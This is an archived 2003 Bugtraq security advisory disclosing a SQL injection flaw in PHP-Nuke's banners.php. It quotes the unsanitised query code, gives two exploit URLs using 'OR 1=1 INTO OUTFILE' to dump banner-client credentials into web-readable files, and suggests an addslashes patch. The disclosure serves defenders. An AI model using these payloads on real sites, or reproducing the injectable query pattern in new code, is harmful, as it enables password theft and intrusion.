lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <F117Qp2yYbxrPEvzLED0000fe7b@hotmail.com>
Date: Sat, 22 Mar 2003 14:35:19 +0100
From: "Frog Man" <leseulfrog@...mail.com>
To: bugtraq@...urityfocus.com
Cc: vulnwatch@...nwatch.org
Subject: PHP-Nuke : banners.php




Informations :
°°°°°°°°°°°°°°
language : PHP
Website : http://www.phpnuke.org
Versions : 5.6, 6.0, 6.5 RC1, 6.5 RC2, 6.5 RC3, 6.5
Problem : SQL Injection
Config : This will work if magic_quotes_gpc=OFF

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
banners.php :
------------------------------------------------------------------------
[...]
function bannerstats($login, $pass) {
    global $prefix, $db, $sitename;
    $sql = "SELECT cid, name, passwd FROM ".$prefix."_bannerclient WHERE 
login='$login'";
    $result = $db->sql_query($sql);
    $row = $db->sql_fetchrow($result);
[...]

function change_banner_url_by_client($login, $pass, $cid, $bid, $url, 
$alttext) {
    global $prefix, $db;
    $sql = "SELECT passwd FROM ".$prefix."_bannerclient WHERE cid='$cid'";
    $result = $db->sql_query($sql);
    $row = $db->sql_fetchrow($result);
    $passwd = $row[passwd];
    if (!empty($pass) AND $pass==$passwd) {
	$alttext = ereg_replace("\"", "", $alttext);
	$alttext = ereg_replace("'", "", $alttext);
	$db->sql_query("UPDATE ".$prefix."_banner SET clickurl='$url', 
alttext='$alttext' WHERE bid='$bid'");
	echo "<br><center>";
	if ($url != "") {
	    echo "You changed the URL<br>";
	}
	if ($alttext != "") {
	    echo "You changed the Alternate Text";
	}
	echo "<br><br><a href=\"javascript:history.go(-1)\">Back to Stats 
Page</a></center>";
    } else {
	echo "<center><br>Your login/password doesn't match.<br><br>Please <a 
href=\"banners.php?op=login\">login again</a></center>";
    }

}

switch($op) {

[...]

    case "Ok":
	bannerstats($login, $pass);
	break;

    case "Change":
	change_banner_url_by_client($login, $pass, $cid, $bid, $url, $alttext);
	break;

}
[...]

?>
------------------------------------------------------------------------


Exploit :
°°°°°°°°°
This will save id, name and crypted password into 
http://[target]/banners1.txt :
http://[target]/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt

This will save crypted password into http://[target]/banners2.txt :
http://[target]/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .
Into banners.php, put befoire the switch :
--------------------------
$cid=addslashes($cid);
$login=addslashes($login);
--------------------------


More details :
°°°°°°°°°°°°°°
in French :
http://www.frogsecure.com/tutos/PHP-Nuke-banners.php.txt




frog-m@n



_________________________________________________________________
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ